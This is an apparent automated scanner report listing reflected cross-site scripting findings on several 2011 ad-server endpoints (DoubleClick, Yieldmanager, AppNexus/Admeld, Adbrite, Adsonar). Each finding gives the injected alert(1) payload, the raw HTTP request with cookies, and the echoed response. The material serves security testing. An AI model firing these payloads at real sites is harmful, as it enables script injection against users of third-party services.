Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fffd8"-alert(1)-"2804db10e66 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
dx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667fffd8"-alert(1)-"2804db10e66&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscU
...[SNIP]...

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3db8"-alert(1)-"90fc3118986 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoc3db8"-alert(1)-"90fc3118986&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48f94'-alert(1)-'590fb15d724 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
v8/3b05/7/121/%2a/g%3B240678286%3B0-0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto48f94'-alert(1)-'590fb15d724&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&
...[SNIP]...

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbn

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd21'-alert(1)-'2002c00180f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/fbn;pos=kontera;sz=1x1;ord=504013981?&dbd21'-alert(1)-'2002c00180f=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 342

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/y;225079562;0-0;1;22018143;31-1/1;36828959/36846837/1;;~okv=;pos=kontera;sz=1x1;;dbd21'-alert(1)-'2002c00180f=1;~aopt=2/1/9e/0;~sscs=%3fhttp://www.foxnews.com">
...[SNIP]...

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed949"-alert(1)-"308f54cef8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1&ed949"-alert(1)-"308f54cef8d=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:46 GMT
Pragma: no-cache
Content-Length: 4432
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
k=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1748713; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&y=29&ed949"-alert(1)-"308f54cef8d=1&s=1748713&_salt=2823841568";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2784'-alert(1)-'79a228804ed was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:14 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56dd9'-alert(1)-'f19d2452188 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:26 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20743<script>alert(1)</script>2dc6e370893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Thu, 12 May 2011 11:41:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4c3ea<script>alert(1)</script>9e43e26b8da was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=8857684c3ea<script>alert(1)</script>9e43e26b8da&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:57 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2951


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "8857684c3ea<script>alert(1)</script>9e43e26b8da"

   
                                                           </head>
...[SNIP]...

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2ebb1--><script>alert(1)</script>46c8034e10 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=15175622ebb1--><script>alert(1)</script>46c8034e10&pid=885768&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
